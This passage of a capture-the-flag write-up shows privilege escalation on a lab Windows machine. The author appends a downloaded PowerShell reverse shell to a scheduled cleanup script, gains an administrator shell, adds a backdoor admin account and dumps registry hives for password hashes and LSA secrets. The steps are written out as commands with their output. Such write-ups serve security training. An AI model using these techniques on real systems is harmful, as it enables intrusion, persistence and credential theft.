9ab22c7d0b315b476d2a05261b414a0d
/mnt/Users #

User - Administrator

In the Administrator's Documents folder on the mounted host drive we find several scripts that reset the box to its original state; they look like they are run periodically, most likely by a scheduled task.

/mnt/Users/Administrator/documents # ls -lah
total 8K     
drwxrwxrwx    1 root     root        4.0K Nov 11 12:53 .
drwxrwxrwx    1 root     root        4.0K Nov  3 12:05 ..
lrwxrwxrwx    1 root     root          37 Mar 24  2025 My Music -> /mnt/host/c/Users/Administrator/Music
lrwxrwxrwx    1 root     root          40 Mar 24  2025 My Pictures -> /mnt/host/c/Users/Administrator/Pictures
lrwxrwxrwx    1 root     root          38 Mar 24  2025 My Videos -> /mnt/host/c/Users/Administrator/Videos
-rwxrwxrwx    1 root     root         508 Nov 10 17:55 container_cleanup.ps1
-rwxrwxrwx    1 root     root         453 Nov  3 12:16 copy.ps1
-rwxrwxrwx    1 root     root         445 Oct 30 16:29 db_cleanup.ps1
-rwxrwxrwx    1 root     root         402 Mar 24  2025 desktop.ini
drwxrwxrwx    1 root     root        4.0K Oct 30 08:12 docker_setup
/mnt/Users/Administrator/documents # cat copy.ps1
$localFile = "C:\Users\marcus\Desktop\user.txt"
$containerName = "web"
$containerFile = "/home/marcus/user.txt"
$attempts = 50

for ($i = 1; $i -le $attempts; $i++) {
    $status = docker inspect -f '{{.State.Running}}' $containerName 2>$null

    if ($status -eq "true") {
        docker cp $localFile ($containerName + ":" + $containerFile)
    } else {
        Start-Sleep -Seconds 5
        $i--
    }

    Start-Sleep -Seconds 2
}
/mnt/Users/Administrator/documents # cat container_cleanup.ps1
start-sleep 100

$containers = docker ps --format "{{.ID}} {{.Image}} {{.RunningFor}}"

foreach ($line in $containers) {
    $parts = $line -split ' '
    $id = $parts[0]
    $image = $parts[1]
    $time = $parts[2]
    $unit = $parts[3]

    if ($image -in @('docker_setup-nginx-php', 'docker_setup-mariadb')) {
        continue
    }

    if (($unit -eq 'minutes' -and [int]$time -gt 10) -or
        ($unit -eq 'hours') -or
        ($unit -eq 'days')) {
        docker rm -f $id
    }
}
/mnt/Users/Administrator/documents # cat db_cleanup.ps1
$containerName = "web"
$localSqlFile = "C:\Users\Administrator\Documents\02-cacti.sql"
$containerSqlFile = "/tmp/02-cacti.sql"
$dbUser = "cactidbuser"
$dbPass = "7pyrf6ly8qx4"
$dbHost = "mariadb"
$dbName = "cacti"

docker cp $localSqlFile "$($containerName):$containerSqlFile"
docker exec -i $containerName bash -c "mysql -u $dbUser -p$dbPass -h $dbHost $dbName < $containerSqlFile"
docker exec $containerName rm -f $containerSqlFile
/mnt/Users/Administrator/documents # 

We generate a PowerShell reverse shell with revshells.

powershell -e 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

Because the host drive is mounted read-write, we append that line to container_cleanup.ps1; whatever runs the script on the host will execute our payload too.

/mnt/Users/administrator/documents # wget 10.10.14.26/exploit.ps1
Connecting to 10.10.14.26 (10.10.14.26:80)
saving to 'exploit.ps1'
exploit.ps1          100% |****************************************************************************************************************************************|  1841  0:00:00 ETA
'exploit.ps1' saved
/mnt/Users/administrator/documents # ls
My Music               My Videos              copy.ps1               desktop.ini            exploit.ps1
My Pictures            container_cleanup.ps1  db_cleanup.ps1         docker_setup
/mnt/Users/administrator/documents # cat exploit.ps1
powershell -e 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

/mnt/Users/administrator/documents # cat exploit.ps1 >> container_cleanup.ps1
/mnt/Users/administrator/documents # 

After a few seconds the script ran and we got a shell as administrator.

❯ rlwrap nc -lvp 5555
listening on [any] 5555 ...
connect to [10.10.14.26] from monitorsfour.htb [10.129.45.249] 61441

PS C:\WINDOWS\system32> whoami
monitorsfour\administrator
PS C:\WINDOWS\system32> cd C:/users/administrator/desktop
PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                 LastWriteTime         Length Name                                            
----                 -------------         ------ ----                                            
-ar---         12/6/2025   2:31 PM             34 root.txt                                        


PS C:\users\administrator\desktop> cat root.txt
9ab22c7d0b315b476d2a05261b414a0d
PS C:\users\administrator\desktop>

Dump Hashes

For a more stable session we create a user and add it to the Administrators and Remote Management Users groups, so it can log in over WinRM (5985).

# Local account that can authenticate over WinRM with full admin rights
$Password = ConvertTo-SecureString "StrongPassword123!" -AsPlainText -Force
New-LocalUser -Name "sckull" -Password $Password
Add-LocalGroupMember -Group "Administrators" -Member "sckull"
Add-LocalGroupMember -Group "Remote Management Users" -Member "sckull"

We verify the group memberships.

PS C:\> net user sckull
User name                    sckull
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/6/2025 11:58:51 PM
Password expires             1/17/2026 11:58:51 PM
Password changeable          12/6/2025 11:58:51 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *None                 
The command completed successfully.

PS C:\>

evil-winrm-py gives us access to the machine.

❯ evil-winrm-py -u sckull -p 'StrongPassword123!' -i monitorsfour.htb
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.5.0

[*] Connecting to 'monitorsfour.htb:5985' as 'sckull'
evil-winrm-py PS C:\Users\sckull\Documents> whoami
monitorsfour\sckull
evil-winrm-py PS C:\Users\sckull\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
evil-winrm-py PS C:\Users\sckull\Documents>

We save the SYSTEM, SECURITY and SAM hives with reg save and download them.

evil-winrm-py PS C:\Users\sckull\Documents> reg save HKLM\SYSTEM SYSTEM
The operation completed successfully.

evil-winrm-py PS C:\Users\sckull\Documents> reg save HKLM\SECURITY SECURITY
The operation completed successfully.

evil-winrm-py PS C:\Users\sckull\Documents> reg save HKLM\SAM SAM
The operation completed successfully.

evil-winrm-py PS C:\Users\sckull\Documents> download SAM SAM
Downloading C:\Users\sckull\Documents\SAM: 128kB [00:00, 710MB/s]                                                                                                                       
[+] File downloaded successfully and saved as: /home/kali/htb/monitorsfour/SAM
evil-winrm-py PS C:\Users\sckull\Documents> download SECURITY SECURITY
Downloading C:\Users\sckull\Documents\SECURITY: 64.0kB [00:00, 477MB/s]                                                                                                                 
[+] File downloaded successfully and saved as: /home/kali/htb/monitorsfour/SECURITY
evil-winrm-py PS C:\Users\sckull\Documents> download SYSTEM SYSTEM
Downloading C:\Users\sckull\Documents\SYSTEM: 16.9MB [00:14, 1.22MB/s]                                                                                                                  
[+] File downloaded successfully and saved as: /home/kali/htb/monitorsfour/SYSTEM
evil-winrm-py PS C:\Users\sckull\Documents>

Locally we extract the local SAM hashes and LSA secrets with impacket-secretsdump.

❯ impacket-secretsdump -system SYSTEM -security SECURITY -sam SAM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x8a6c03715ce8a8d26720e83ffe01c780
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:41f4136faf5a06a6765a8fcea8870225:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
marcus:1001:aad3b435b51404eeaad3b435b51404ee:a42896a092c80b3383da80bc3c400330:::
sckull:1002:aad3b435b51404eeaad3b435b51404ee:ccad9cd271d517d14d1950b6a317ba1e:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):817mkh27zdp6!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x48249fb0f4cf23ecbef54affc2b21d65717bf7df
dpapi_userkey:0xb8820f0412fc851cca8aa426248e7f37af5dd0b2
[*] NL$KM 
 0000   FA 36 C7 D5 C0 82 AB B5  78 E1 17 F0 5E 36 13 5B   .6......x...^6.[
 0010   A5 9F C0 9C 38 A8 C4 34  FE 20 F7 2B D9 A2 8C AF   ....8..4. .+....
 0020   71 F2 E0 D2 09 A1 EC 09  EB DE 9B 8C F5 4A E6 2D   q............J.-
 0030   6B 1D 32 16 A2 ED B4 AE  F1 51 AE 5B 41 E5 4E B6   k.2......Q.[A.N.
NL$KM:fa36c7d5c082abb578e117f05e36135ba59fc09c38a8c434fe20f72bd9a28caf71f2e0d209a1ec09ebde9b8cf54ae62d6b1d3216a2edb4aef151ae5b41e54eb6
[*] Cleaning up... 

Dany Sucuc
WRITTEN BY
sckull